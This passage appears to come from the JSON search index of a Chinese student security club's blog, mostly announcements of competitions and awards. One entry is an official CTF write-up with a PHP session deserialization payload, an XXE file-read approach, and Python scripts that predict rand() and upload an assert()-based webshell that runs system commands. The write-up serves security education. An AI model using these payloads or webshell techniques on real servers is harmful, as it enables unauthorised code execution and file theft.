u6c5f\u533a\u4eba\u6c11\u653f\u5e9c\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u3001\u56fd\u5bb6\u5de5\u4e1a\u4fe1\u606f\u5b89\u5168\u53d1\u5c55\u7814\u7a76\u4e2d\u5fc3\u3001\u56fd\u5bb6\u8ba1\u7b97\u673a\u7f51\u7edc\u5e94\u6025\u6280\u672f\u5904\u7406\u534f\u8c03\u4e2d\u5fc3\u3001\u963f\u91cc\u4e91\u8ba1\u7b97\u6709\u9650\u516c\u53f8\u3001\u676d\u5dde\u6d77\u5eb7\u5a01\u89c6\u6570\u5b57\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u6d59\u6c5f\u5927\u534e\u6280\u672f\u80a1\u4efd\u6709\u9650\u516c\u53f8\u8054\u5408\u627f\u529e\u7684\u897f\u6e56\u8bba\u5251\u2022\u7f51\u7edc\u5b89\u5168\u5927\u4f1a
\u5b9a\u6863\u4eca\u5e744\u670827\u65e5\uff0c\u897f\u6e56\u8bba\u5251\u676f
\u5168\u56fd\u5927\u5b66\u751f\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u6280\u80fd\u5927\u8d5b \u4f5c\u4e3a\u672c\u6b21\u8bba\u575b\u4e2d\u6700\u53d7\u77a9\u76ee\u7684\u90e8\u5206\u4e4b\u4e00\uff0c\u4e5f\u5c06\u4e8e4\u670826\u65e5\u5f00\u542f\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/9806f2d8-b4ad-48d3-ad34-5481b1e8e35b/","title":"2018 \u7b2c\u5341\u4e00\u5c4a\u5168\u56fd\u5927\u5b66\u751f\u4fe1\u606f\u5b89\u5168\u5927\u8d5b \u4e09\u7b49\u5956\uff08\u534e\u4e1c\u5357\u8d5b\u533a\u7b2c4\u540d\uff09","text":"\u81ea\u5df1\u53bb\u770b\u5427 http://www.ciscn.cn/home
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/","title":"\u4e3e\u529e2018MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b","text":"\u4ece\u653e\u5047\u5230\u73b0\u5728\u7b79\u529e\u51c6\u5907\u4e86\u63a5\u8fd1\u4e24\u4e2a\u661f\u671f\u7684MOCTF\u65b0\u6625\u6b22\u4e50\u8d5b\u7ec8\u4e8e\u843d\u5e55\u5566\uff0c\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e00\u5171\u51fa\u4e861\u7b7e\u5230+1MISC+3WEB\uff0c\u4e0b\u9762\u5148\u653e\u5b98\u65b9WriteUp\uff08\u54c7\u7ec8\u4e8e\u80fd\u5f53\u4e00\u56de\u5b98\u65b9\u4e86\uff09
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_1","title":"\u7b7e\u5230","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#20","title":"\u7b7e\u5230 20","text":"\u652f\u4ed8\u5b9d\u4eca\u5e74\u96c6\u9f50\u4e94\u798f\u80fd\u4e00\u8d77\u5e73\u5206\u591a\u5c11\u94b1\uff1f\nflag\u683c\u5f0f\uff1amoctf{\u6570\u5b57}\n
flag:moctf{500000000}
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#misc","title":"MISC","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#word-100","title":"\u7a7aword 100","text":"\u771f\u7684\u4ec0\u4e48\u90fd\u6ca1\u6709\u5417\n
\u6587\u4ef6\u662f\u4e2aword \u6253\u5f00\u770b\u53d1\u73b0\u4e00\u4e9b\u5947\u602a\u7684\u6362\u884c\u548ctab \u5f88\u5bb9\u6613\u60f3\u5230\u662f\u6469\u65af\u5bc6\u7801\uff0c\u66ff\u6362\u540e\u5f97\u5230
-.... -.. -.... ..-. -.... ...-- --... ....- -.... -.... --... -... ....- ..--- -.... -.-. ...-- ....- -.... . -.... -... ..... ..-. ...-- ----- --... ..--- ..... ..-. --... ....- -.... .---- -.... ..--- ...-- ..-. --... -..\n
\u89e3\u6469\u65af\u5bc6\u7801\uff0c\u7136\u540ehex\u8f6c\u5b57\u7b26\u4e32\u5f97\u5230flag
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#web","title":"WEB","text":"","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#300","title":"\u767b\u5f55\u4e00\u54c8 300","text":"\u767b\u5f55\u4e00\u4e0b\uff0c\u4f60\u5c31\u77e5\u9053\u3002\nhttp://111.230.32.124:6001/\n
\u6e90\u7801\u653e\u5230git\u91cc\u6cc4\u9732\u7ed9\u5927\u5bb6\u4e86 index.php
<?php\n ini_set('session.serialize_handler', 'php_binary');\n session_start();\n\n if(isset($_POST['username']) && isset($_POST['password'])){\n $username = $_POST['username'];\n $password = $_POST['password'];\n $_SESSION[\"username\"] = $username;\n header(\"Location:./index.php\");\n }\n else if(isset($_SESSION[\"username\"])){\n echo '<h1>hello '.$_SESSION[\"username\"].'</h1>';\n }\n else ...\n
flag.php
<?php\nsession_start();\nclass MOCTF{\n public $flag;\n public $name;\n function __destruct(){\n $this->flag = \"moctf{xxxxxxxxxxxxxxxx}\";\n if($this->flag == $this->name){\n echo \"Wow,this is flag:\".$this->flag;\n }\n }\n}\n
\u770b\u6e90\u7801\u5c31\u53ef\u4ee5\u77e5\u9053\u8fd9\u9053\u9898\u8003\u67e5\u7684\u662fsession\u53cd\u5e8f\u5217\u6f0f\u6d1e\u4e86 \u5728index.php\u4e2dphp\u7684\u5e8f\u5217\u5316handler\u662f\u2019php_binary\u2019\uff0c\u800cflag.php\u91cc\u6ca1\u6709\u8bbe\u7f6e\uff0c\u5c31\u662f\u9ed8\u8ba4\u7684\u2019php\u2019
ini_set('session.serialize_handler', 'php_binary');\n
\u53c2\u8003https://blog.spoock.com/2016/10/16/php-serialize-problem/ index.php\u4e2d\u7684$_session['username']
\u53ef\u63a7\uff0c\u6211\u4eec\u5c31\u80fd\u6784\u9020payload\u5230session\uff0c \u7136\u540e\u8bbf\u95eeflag.php\u9875\u9762\u5c31\u80fd\u89e6\u53d1\u53cd\u5e8f\u5217\u5316\u6267\u884c__destruct
\u4e86\uff0c \u8fd9\u91cc\u8fd8\u6709\u4e2a\u8003\u70b9\u662f$this->flag == $this->name
\uff0c\u901a\u8fc7\u5f15\u7528\u7684\u65b9\u5f0f\u7ed5\u8fc7\u3002 \u6784\u9020payload
$a = new MOCTF();\n$a->name = &$a->flag;\necho '|'.serialize($a);\n
|O:5:\"MOCTF\":2:{s:4:\"flag\";N;s:4:\"name\";R:2;}\n
\u63d0\u4ea4\u5230index.php\u7684username\uff0c\u7136\u540e\u8bbf\u95eeflag.php\u5c31\u5f97\u5230flag\u4e86
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400","title":"\u5b57\u7b26\u4e32\u68c0\u67e5 400","text":"\u6765\u68c0\u67e5\u4e00\u4e0b\u4f60\u7684\u5b57\u7b26\u4e32\u662f\u5426\u683c\u5f0f\u826f\u597d\u5427\uff01\nhttp://111.230.32.124:6002/\n
\u539f\u610f\u662fxxe\u6f0f\u6d1e\u8bfb\u53d6\u4efb\u610f\u6587\u4ef6 \u540e\u6765\u77e5\u9053\u5e08\u5085\u4eec\u5361\u4e86\u5f88\u4e45\u8c8c\u4f3c\u662f\u56e0\u4e3aclient-ip
\u7684\u539f\u56e0\uff0c\u6211\u7684\u9505 \u9898\u76ee\u6253\u5f00\u662f\u4e2ajson\u5b57\u7b26\u4e32\u9a8c\u8bc1\u7684\u9875\u9762\uff0cPOST\u5305\u7684Content-Type
\u5b57\u6bb5\u662fapplication/json
\uff0c POST\u540e\u63a5\u53e3\u4f1a\u8fd4\u56dejson\u683c\u5f0f\u6b63\u786e\u6216\u9519\u8bef\u7684\u7ed3\u679c \u6539\u6210application/xml
\uff0c\u63a5\u53e3\u63d0\u793a\u53ea\u5141\u8bb8\u672c\u673a\u8bbf\u95ee\uff0c\u4e8e\u662f\u6784\u9020
client-ip:localhost\n
\u7136\u540e\u5c31\u662fxxe\u76f2\u6253\u6f0f\u6d1e\u4e86\uff0c\u53c2\u8003https://security.tencent.com/index.php/blog/msg/69 \u8fd9\u91cc\u6211\u53ea\u9650\u5236\u4e86payload\u957f\u5ea6\u4e3a170\u4ee5\u5185\uff0c\u5176\u5b9e\u5b8c\u5168\u53ef\u4ee5\u66f4\u77ed\u7684\uff0c\u5e0c\u671b\u5927\u4f6c\u4eec\u53ef\u4ee5\u6d4b\u8bd5\u6d4b\u8bd5 \u6700\u540eflag\u5728/etc/passwd
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#400_1","title":"\u7b80\u5355\u5ba1\u8ba1 400","text":"\u4ee3\u7801\u90fd\u7ed9\u4f60\u4e86\uff0c\u8fd8\u8bf4\u4e0d\u4f1a\u505a\uff1f\nhttp://120.78.57.208:6005/\n
index.php
<?php\nerror_reporting(0);\ninclude('config.php');\nheader(\"Content-type:text/html;charset=utf-8\");\nfunction get_rand_code($l = 6) {\n $result = '';\n while($l--) {\n $result .= chr(rand(ord('a'), ord('z')));\n }\n return $result;\n}\n\nfunction test_rand_code() {\n $ip=$_SERVER['REMOTE_ADDR'];\n $code=get_rand_code();\n $socket = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\n @socket_connect($socket, $ip, 8888);\n @socket_write($socket, $code.PHP_EOL);\n @socket_close($socket);\n die('test ok!');\n}\n\nfunction upload($filename, $content,$savepath) {\n $AllowedExt = array('bmp','gif','jpeg','jpg','png');\n if(!is_array($filename)) {\n $filename = explode('.', $filename);\n }\n if(!in_array(strtolower($filename[count($filename)-1]),$AllowedExt)){\n die('error ext!');\n }\n $code=get_rand_code();\n $finalname=$filename[0].'moctf'.$code.\".\".end($filename);\n file_put_contents(\"$savepath\".$finalname, $content);\n usleep(3000000);\n unlink(\"$savepath\".$finalname);\n die('upload over!');\n}\n\n$savepath=\"uploads/\".sha1($_SERVER['REMOTE_ADDR']).\"/\";\nif(!is_dir($savepath)){\n $oldmask = umask(0);\n mkdir($savepath, 0777);\n umask($oldmask);\n}\nif(isset($_GET['action']))\n{\n $act=$_GET['action'];\n if($act==='upload')\n {\n $filename=$_POST['filename'];\n if(!is_array($filename)) {\n $filename = explode('.', $filename);\n }\n $content=$_POST['content'];\n waf($content);\n upload($filename,$content,$savepath);\n }\n else if($act==='test')\n {\n test_rand_code();\n }\n}\nelse {\n highlight_file('index.php');\n}\n?>\n
\u89e3\u91ca\u4e00\u4e0b\u9898\u76ee\u7684\u610f\u601d \u6839\u636eaction\u6267\u884c\u5bf9\u5e94\u64cd\u4f5c\uff0caction=test
\u4f1a\u8c03\u7528test_rand_code
\u51fd\u6570\u53d1\u9001tcp\u5305\u5230\u8bbf\u5ba2\u7684ip action=upload
\u65f6\u4f1a\u5199\u5165\u4e00\u4e2a\u6587\u4ef6\uff0c\u6587\u4ef6\u5185\u5bb9\u6709waf\u62e6\u622a\uff0c\u6587\u4ef6\u540d\u6709\u767d\u540d\u5355\u9650\u5236\u540e\u7f00\uff0c \u7136\u540e\u62fc\u63a5\u6587\u4ef6\u540d\u52a0\u5165rand\u7684\u5b57\u7b26\u4e32\uff0c\u5199\u5165\u6587\u4ef6\uff0c\u6587\u4ef6\u5199\u5165\u540e\u8fc73\u79d2unlink\u5220\u9664 \u6709\u95ee\u9898\u7684\u70b9\u6709\u8fd9\u51e0\u4e2a 1.filename\u68c0\u67e5\u662f\u7528$filename[count($filename)-1]
\u53d6\u7684\u540e\u7f00\uff0c\u662f\u6309\u7167\u4e0b\u6807\u53d6\u7684\uff0c\u800c\u5199\u5165\u6587\u4ef6\u65f6\u7528\u7684\u662fend($filename)
\uff0c\u662f\u53d6\u6700\u540e\u4e00\u4e2a\u5143\u7d20\uff0c\u53ea\u8981post\u65f6\u63d0\u4ea4filename[1]=jpg&filename[0]=php
\u5c31\u80fd\u7ed5\u8fc7\u4e86 2.$content\u7684waf\u7ed5\u8fc7\uff0c \u7ed5\u8fc7\u5373\u53ef 3.\u4f7f\u7528rand()\u751f\u6210\u968f\u673a\u6570\uff0c\u53ef\u4ee5\u88ab\u9884\u6d4b\uff0c\u53c2\u8003https://www.sjoerdlangkemper.nl/2016/02/11/cracking-php-rand/
\u9884\u671f\u89e3\u6cd5\u662f 1.username\u6570\u7ec4bypass\u540e\u7f00\u68c0\u67e5\uff0c\u7ed5\u8fc7content\u7684waf 2.rand\u968f\u673a\u6570\u9884\u6d4b+\u7206\u7834\u6587\u4ef6\u540d \u5728unlink\u4e4b\u524d\u8bbf\u95eeshell \u7ed3\u679c\u5927\u4f6c\u4eec\u76f4\u63a5\u975e\u9884\u671f\u89e3bypass\u4e86unlink
\u6253\u6270\u4e86 \u975e\u9884\u671f\u89e3\u53c2\u8003\u4e00\u53f6\u98d8\u96f6\u5e08\u5085\u7684WriteUp \u9884\u671f\u89e3\u5982\u4e0b \u5199\u4e24\u4e2a\u811a\u672c\uff0c listen.py
#\u76d1\u542c8888\u7aef\u53e3\uff0c\u63a5\u53d76\u4e2a`get_rand_code`\u7684\u7ed3\u679c\uff0c\u7136\u540e\u9884\u6d4b\u63a5\u4e0b\u6765\u4e00\u6b21`get_rand_code`\u7684\u7ed3\u679c\uff0c\u8fd9\u91cc\u53ef\u80fd\u4e0d\u4f1a\u5f88\u51c6\u786e\uff0c\n#\u6240\u4ee5\u9700\u8981\u5c0f\u5e45\u5ea6\u7206\u7834\uff0c\u590d\u6742\u5ea6\u5927\u6982\u4e3a3^6\uff0c\u53cd\u6b63\u5c31\u8dd1\u7740\u5457\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\nfrom socket import * \nfrom time import ctime \nimport random\nimport itertools as its\nimport hashlib\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/\"\n\n\ndef get_rand_list():\n HOST = '' \n PORT = 8888\n BUFSIZ = 128 \n ADDR = (HOST, PORT) \n tcpSerSock = socket(AF_INET, SOCK_STREAM)\n tcpSerSock.bind(ADDR)\n tcpSerSock.listen(5)\n rand_num=0\n l=[]\n while True:\n tcpCliSock, addr = tcpSerSock.accept() \n while True: \n data = tcpCliSock.recv(BUFSIZ) \n if not data: \n break \n data=data[0:6]\n print data,l\n for i in data:\n l.append(ord(i)+1-ord('a'))\n rand_num+=1\n if rand_num==6:\n break\n tcpCliSock.close() \n tcpSerSock.close()\n return l\n\ndef get_salt(l):\n salt=\"\"\n for i in range(6):\n j=len(l)\n r=(l[j-3]+l[j-31])-1\n if r>26:\n r-=26\n #print l[j-3],chr(l[j-3]+ord('a')-1),l[j-31],chr(l[j-31]+ord('a')-1),r,chr(r+ord('a')-1)\n l.append(r)\n salt+=chr(r+ord('a')-1)\n #print salt\n return salt\n\ndef get_flag(salt):\n s=hashlib.sha1('119.23.73.3').hexdigest()\n url1=url+'/uploads/'+s+'/'+'moctf'+salt+'.php'\n data={\"a\":\"system('cat ../../flag.php');echo '666666';\"}\n r2=r.post(url1,data=data)\n print salt\n if '404' not in r2.text:\n print r2.text\n\nget_flag('aaaaaa')\nl=get_rand_list()\nsalt=get_salt(l)\ns=0\nfor i in range(100000):\n s=s+1\nprint s\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n s=\"\".join(i)\n salt2=\"\"\n for j in range(6):\n salt2+=chr(ord(salt[j])-int(s[j]))\n get_flag(salt2)\nwords = \"10\"\no=its.product(words,repeat=6)\nfor i in o:\n s=\"\".join(i)\n salt2=\"\"\n for j in range(6):\n salt2+=chr(ord(salt[j])+int(s[j]))\n get_flag(salt2)\n
put.py
#\u901a\u8fc7`?action=test`\u8c03\u7528`test_rand_code`\u51fd\u6570\u53d1\u90016\u6b21`get_rand_code`\u7ed3\u679c\uff0c\u4e00\u517136\u4e2a\u5b57\u7b26\uff0c\n#\u7136\u540e\u63d0\u4ea4\u4e00\u4e2a\u6784\u9020\u597d\u7684`?action=test`\uff0c\u4e0a\u4f20shell\u5230\u670d\u52a1\u5668\uff0c\u5728\u88ab\u5220\u9664\u4e4b\u524d\u5c31\u4f1a\u88ablisten\u7206\u7834\u5f97\u5230\uff0c\u6ca1\u7206\u7834\u5230\u5c31\u591a\u7206\u7834\u51e0\u6b21\n\n#!/usr/bin/env python\n#-*- coding:utf-8 -*-\n#by xishir\nimport requests as req\nimport re\n\nr=req.session()\nurl=\"http://120.78.57.208:6005/?action=\"\n\n\ndef get_test():\n url2=url+\"test\"\n r1=r.get(url2)\n print url2\n print r1.text\ndef upload():\n data={\"filename[4]\":\"jpg\",\n \"filename[2]\":\"jpg\",\n \"filename[1]\":\"php\",\n \"content\":\"<script language='php'>assert($_POST[a]);</script>\",\n \"a\":\"system('cat ../../flag.php');\"\n }\n url1=url+\"upload\"\n r2=r.post(url1,data=data)\n print r2.text\n\nfor i in range(6):\n get_test()\nupload()\n
\u8fd0\u884c\u7ed3\u679c\u5982\u4e0b
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/a73c51fc-04d5-4aa7-bcdc-c22aa7b67512/#_2","title":"\u611f\u60f3","text":"\u8bb2\u4e00\u4e0b\u8fd9\u6b21\u6bd4\u8d5b\u6211\u4e3b\u8981\u5e72\u4e86\u90a3\u4e9b\u4e8b\u5427
\u51fa\u9898\uff0c\u5982\u4e0a\u6240\u8ff0 \u5e73\u53f0\u642d\u5efa\uff0c\u7528\u7684\u662fctfd\uff0cdocker\u7684\u65b9\u5f0f\u642d\u5efa\u7684\uff0c\u7701\u4e86\u5f88\u591a\u4e8b \u9898\u76ee\u90e8\u7f72\uff0c\u9664\u4e86ping\u90a3\u9898\uff0c\u5176\u4ed6\u7684web\u90fd\u662f\u6211\u90e8\u7f72\u7684\uff0c\u5c24\u5176\u662fcms\u90a3\u9898\uff0c\u53cd\u590d\u90e8\u7f72\u7684\u6709\u70b9\u5410\uff0c\u4e2d\u95f4\u6709\u4e2a\u96c6\u5927\u5b66\u5f1f\u6765\u5e2e\u5fd9\uff0c\u540e\u9762\u6bd4\u8d5b\u7684\u65f6\u5019\u8fd8\u662f\u51fa\u4e86\u95ee\u9898 \u53d1\u5e03\u9898\u76ee\uff0cemmmmmmmmmm\uff0c\u7528ctfd\u7684\u65f6\u5019\u51fa\u73b0\u4e86\u5f88\u795e\u5947\u7684\u60c5\u51b5\uff0c\u5728\u7f16\u8f91config\u7684\u65f6\u5019\u4f7f\u7528\u8c37\u6b4c\u7684\u81ea\u52a8\u7ffb\u8bd1\uff0c\u4fdd\u5b58\u4e4b\u540ectfd\u7684web\u670d\u52a1\u5c31\u6302\u6389\u5566\uff01\u662f\u4e2a\u5de8\u5751\uff0c\u73b0\u5728\u8fd8\u4e0d\u77e5\u9053\u548b\u56de\u4e8b \u6bd4\u8d5b\u65f6\u5019\u7684\u653e\u9898\uff0c\u653ehint\uff0c\u8fd0\u7ef4\uff0c\u6c34\u7fa4\uff0c\u54c8\u54c8\u54c8\u54c8\u548c\u5927\u4f6c\u4eec\u73a9\u800d\u8fd8\u662f\u5f88\u5f00\u5fc3\u7684 \u653e\u4e00\u4e9b\u540e\u53f0\u6570\u636e \u539f\u6765\u53ea\u662f\u60f3\u7ed9\u6211\u4eec\u5b66\u6821\u548c\u96c6\u5927\u7684\u5b66\u5f1f\u4eec\u4f53\u9a8c\u6bd4\u8d5b\u7684\uff0c\u4e0d\u8fc7\u5bf9\u5916\u5f00\u653e\u4e5f\u5438\u5f15\u4e86\u8bb8\u591a\u5e08\u5085\u4eec\u6765\u505a\u9898\uff0c\u867d\u7136\u8fd0\u7ef4\u5f97\u5f88\u7d2f\uff0c\u4f46\u4e5f\u5b66\u5230\u4e86\u5f88\u591a\u4e1c\u897f\uff08\u4e3b\u8981\u662f\u975e\u9884\u671f\u548c\u90e8\u7f72\u5404\u79cd\u5947\u8469\u73af\u5883\uff09 \u6253\u4e00\u6ce2\u5e7f\u544a\uff0chttp://www.moctf.com/ MOCTF\u5e73\u53f0\u662fCodeMonster\u548cMokirin\u8fd9\u4e24\u652fCTF\u6218\u961f\u6240\u642d\u5efa\u7684\u4e00\u4e2aCTF\u5728\u7ebf\u7b54\u9898\u7cfb\u7edf\u3002\u9898\u76ee\u5f62\u5f0f\u4e0e\u5404\u5927CTF\u6bd4\u8d5b\u76f8\u540c\u3002\u76ee\u7684\u662f\u4e3a\u4e24\u4e2a\u5b66\u6821\u4e2d\u70ed\u7231\u4fe1\u606f\u5b89\u5168\u7684\u540c\u5b66\u4eec\u63d0\u4f9b\u4e00\u4e2a\u5237\u9898\u7684\u5e73\u53f0\uff0c\u80fd\u591f\u4e00\u8d77\u5b66\u4e60\u3001\u8fdb\u6b65\u3002
\u6700\u540e\u795d\u5927\u5bb6\u65b0\u5e74\u5feb\u4e50\uff01
","tags":["\u5b66\u672f\u7ade\u8d5b","Writeup"]},{"location":"posts/ab21d401-10e1-4021-9936-e7154fd9ed71/","title":"\u4e3e\u529e\u7b2c\u4e8c\u5c4a\u53a6\u95e8\u7406\u5de5\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b","text":"\u4e3a\u5e2e\u52a9\u5b66\u751f\u66f4\u597d\u5730\u611f\u77e5\u3001\u4e86\u89e3\u8eab\u8fb9\u7684\u7f51\u7edc\u5b89\u5168\u98ce\u9669\uff0c\u589e\u5f3a\u7f51\u7edc\u5b89\u5168\u610f\u8bc6\uff0c\u666e\u53ca\u7f51\u7edc\u5b89\u5168\u77e5\u8bc6\uff0c\u63d0\u9ad8\u7f51\u7edc\u5b89\u5168\u9632\u62a4\u6280\u80fd\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662\u8ba1\u7b97\u673a\u4e0e\u4fe1\u606f\u5de5\u7a0b\u5b66\u9662\u7279\u6b64\u4e3e\u529e\u201c\u56fd\u79d1-i\u6625\u79cb\u676f\u201d\u7b2c\u4e8c\u5c4a\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u5927\u8d5b
\uff0c\u4ee5\u6b64\u6380\u8d77\u5b66\u751f\u201c\u5171\u5efa\u7f51\u7edc\u4fe1\u606f\u5b89\u5168\u3001\u5171\u4eab\u7f51\u7edc\u6587\u660e\u5b66\u6821\u201d\u7684\u70ed\u6f6e\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/b6adcea6-60ce-4f44-9389-2a06d34125d8/","title":"\u201c\u767e\u8d8a\u676f\u201d\u7b2c\u56db\u5c4a\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b \u4e00\u7b49\u5956","text":"\u4e3a\u8d2f\u5f7b\u843d\u5b9e\u4e2d\u592e\u7f51\u4fe1\u529e\u7b49\u516d\u90e8\u95e8\u300a\u5173\u4e8e\u52a0\u5f3a\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u5efa\u8bbe\u548c\u4eba\u624d\u57f9\u517b\u7684\u610f\u89c1\u300b\uff08\u4e2d\u7f51\u529e\u53d1\u6587\u30142016\u30154\u53f7\uff09\u7cbe\u795e\uff0c\u52a0\u5feb\u9ad8\u6821\u7f51\u7edc\u5b89\u5168\u5b66\u79d1\u4e13\u4e1a\u5efa\u8bbe\uff0c\u521b\u65b0\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u57f9\u517b\u673a\u5236\uff0c\u7701\u6559\u80b2\u5385\u3001\u7701\u7f51\u5b89\u529e\u51b3\u5b9a\u8054\u5408\u4e3e\u529e\u7b2c\u4e09\u5c4a\u201c\u798f\u5efa\u7701\u9ad8\u6821\u7f51\u7edc\u7a7a\u95f4\u5b89\u5168\u5927\u8d5b\u201d
\u3002
\u672c\u534f\u4f1a\u6d3e\u51fa\u7684CodeMonster
\u6218\u961f\u5168\u7701\u7b2c\u4e8c\u593a\u5f97\u4e8c\u7b49\u5956
\u3002
","tags":["\u5b66\u672f\u7ade\u8d5b"]},{"location":"posts/bb168e48-791c-4a1d-83c4-335b9db12499/","title":"2018 \u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u798f\u5efa\u8d5b\u533a \u4e00\u7b49\u5956\uff08\u7b2c2\u540d\uff09","text":"2018\u5e745\u670811\u65e5\uff0c\u7531\u6559\u80b2\u90e8\u5b66\u6821\u89c4\u5212\u5efa\u8bbe\u53d1\u5c55\u4e2d\u5fc3\u3001\u4e2d\u56fd\u4fe1\u606f\u5b89\u5168\u6d4b\u8bc4\u4e2d\u5fc3\u4e3b\u529e\uff0c\u6559\u80b2\u90e8\u9ad8\u7b49\u5b66\u6821\u4fe1\u606f\u5b89\u5168\u4e13\u4e1a\u6559\u5b66\u6307\u5bfc\u59d4\u5458\u4f1a\u534f\u529e\uff0c\u4e2d\u56fd\u4fe1\u606f\u4ea7\u4e1a\u5546\u4f1a\u4fe1\u606f\u5b89\u5168\u4ea7\u4e1a\u5206\u4f1a\u3001\u5317\u4eac\u897f\u666e\u9633\u5149\u6559\u80b2\u79d1\u6280\u80a1\u4efd\u6709\u9650\u516c\u53f8\u3001\u798f\u5dde\u5927\u5b66\u627f\u529e\u76842017-2018\u5168\u56fd\u9ad8\u6821\u201c\u897f\u666e\u676f\u201d\u4fe1\u606f\u5b89\u5168\u94c1\u4eba\u4e09\u9879\u8d5b\u7b2c\u4e03\u5206\u533a\u8d5b\u5728\u798f\u5dde\u5927\u5b66\u62c9\u5f00\u5e37\u5e55\uff0c\u6709\u6765\u81ea\u798f\u5efa\u5171\u8ba121\u6240\u9ad8\u6821\u8fd1100\u540d\u5b66\u751f\u540c\u573a\u7ade\u6280\u3002\u7ecf\u8fc7\u4e00\u5929\u7684\u7cbe\u5f69\u89d2\u9010\uff0c\u798f\u5efa\u519c\u6797\u5927\u5b66\u529b\u514b\u7fa4\u96c4\uff0c\u593a\u5f97\u7b2c\u4e03\u8d5b\u533a\u51a0\u519b\uff0c\u53a6\u95e8\u7406\u5de5\u5b66\u9662
\u3001\u95fd\u5357\u5e08\u8303\u5927\u5b66\u5206\u522b\u83b7\u5f97\u4e9a\u519b\u548c\u5b63\u519b\u3002
"},{"location":"posts/dfd03705-8ad1-420f-8534-0fd4086165e7/","title":"2017 XNUCA\u7b2c\u4e00\u671fWeb\u4e13\u9898 \u7b2c9\u540d","text":"\u201c\u5168\u56fd\u9ad8\u6821\u7f51\u5b89\u8054\u8d5b
(National University Cybersecurity Association\uff0c\u7b80\u79f0X-NUCA)\u201d\u662f\u9762\u5411\u5168\u56fd\u9ad8\u6821\u5b66\u751f\u7684\u7f51\u7edc\u5b89\u5168\u6280\u80fd\u7ade\u8d5b\uff0c\u9996\u5c4a\u6bd4\u8d5b\u5df2\u4e8e2016\u5e747\u670831\u65e5\u4e3e\u529e\uff0c\u5927\u8d5b\u79c9\u627f\u201c\u5bd3\u5b66\u4e8e\u8d5b\uff0c\u4ee5\u8d5b\u4fc3\u5b66\u201d\u7684\u7406\u5ff5\uff0c\u63a8\u51fa\u201c\u7ade\u8d5b+\u201d\u6a21\u5f0f\uff0c\u5c06\u8d5b\u524d\u6307\u5bfc\u3001\u8d5b\u4e2d\u953b\u70bc\u548c\u8d5b\u540e\u4ea4\u6d41\u4e09\u8005\u6709\u673a\u7ed3\u5408\uff0c\u65e8\u5728\u66f4\u597d\u5730\u4fc3\u8fdb\u56fd\u5bb6\u7f51\u7edc\u5b89\u5168\u4eba\u624d\u7684\u57f9\u517b\u548c\u9009\u62d4\u3002 X-NUCA
\u8054\u8d5b\u9762\u5411\u5168\u56fd\u5728\u6821\u5b66\u751f\uff0c\u5305\u62ec\u4e13\u79d1\u751f\u3001\u672c\u79d1\u751f\u3001\u7855\u58eb\u751f\u548c\u535a\u58eb\u751f\uff0c\u9700\u7531\u6307\u5bfc\u8001\u5e08\u5e26\u961f\u53c2\u8d5b\u30022017\u8d5b\u5b63\u5206\u4e3a\u4e13\u9898\u8d5b\u548c\u603b\u51b3\u8d5b\u4e24\u4e2a\u9636\u6bb5\uff0c\u9996\u6b21\u4e13\u9898\u8d5b2017\u5e748\u670826\u65e5\u4e3e\u529e\u3002\u4e13\u9898\u8d5b\u5305\u542b3\u671f\u7ebf\u4e0a\u8d5b\uff0c\u5206\u522b\u57288\u670826\u65e5\u300110\u67088\u65e5\u300111\u670825\u65e5\u4e3e\u529e\uff0c12\u6708\u4e3e\u529e\u603b\u51b3\u8d5b\u5e76\u9881\u5956\u3002 